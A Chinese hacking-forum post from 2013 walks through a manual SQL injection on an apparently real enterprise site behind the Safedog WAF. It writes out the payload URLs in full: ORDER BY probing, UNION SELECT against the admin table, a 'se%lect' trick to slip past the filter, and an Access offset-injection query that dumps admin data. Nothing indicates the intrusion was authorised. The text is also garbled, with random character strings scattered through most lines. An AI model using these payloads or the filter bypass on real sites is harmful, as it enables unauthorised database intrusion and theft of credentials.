找回密码
 立即注册
查看: 2753|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
& y  F& L8 h2 j8 C4 p
* U3 B+ Z- T. b1 I- ]
' P4 ^! U. m3 ]- |  q$ E顺手加个admin
5 N, X8 @0 g. @: j6 k+ B7 a6 E
. z* }4 ~: `4 V0 T3 f. r# Z6 p" k2 z* @# P7 l" l' k. X4 c- b
默认后台。# k" h+ _* A3 I0 O9 S- U- d. A# e( \& k
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​$ B7 [( Z" j2 u+ p7 C3 A; ?
9 w# i) G1 Z  Z  p' l, R
+ L9 a$ o- [4 L; Z, b0 e

" y/ Q1 x+ q8 v4 I; t6 P所以就不用御剑扫了,待会直接封IP。3 V0 `0 E& A& V; o" S9 m
9 T" T) J: H' c1 P" A( i
用order by语句判断是否存在注入。0 R. I. b2 f6 Z( [$ w" O
http://www.xxx.com /product_show.asp?id=997 order by 1; P" G8 l9 l" m/ p* |/ F( ?& M
http://www.xxx.com /product_show.asp?id=997 order by 100
7 {/ E' c! n4 |$ c: \现在存在注入,经测试后发现是9个字段。/ f! t) f% O1 w! c% X
) s3 F! b; C1 l
接下来进行联合查询,猜是否存在admin表。
2 A& D9 t, g8 D2 @, a, x  {# ]' H& r! {http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​# v. u" c% W# u4 h7 c0 L
+ L$ M9 _9 [2 p7 f
0 o2 j' z8 _5 M9 I5 _

& W) \# w5 @- o* u" P在select中间加个%,se%lect绕过安全狗。
$ w( I" G* U9 ~
& g. h0 n9 B5 C& Q! P7 t% l; l( l1 n( l/ C- u0 M4 K0 A
发现存在admin表,然后开始手工猜常用的字段。$ F& G" I2 i( u3 m
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。5 S: F0 T, G, \3 |8 O) f5 V
0 F* P0 u$ {  Q$ o
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
5 s% P1 F5 ?7 @0 x( f ) b6 x; b7 y/ Q+ D6 k, D
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
) r- M! |+ `- O+ ghttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
5 a. o: g. j5 m* V& q; r  _好了,敏感内容出显了。​" G4 ]+ Y1 `% J: s* V
0 T# E6 \# U0 `* O4 ]  ^* G8 K  ]. P0 W
- m4 u: ~& u/ H
- o' o& T* C! \) G+ n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表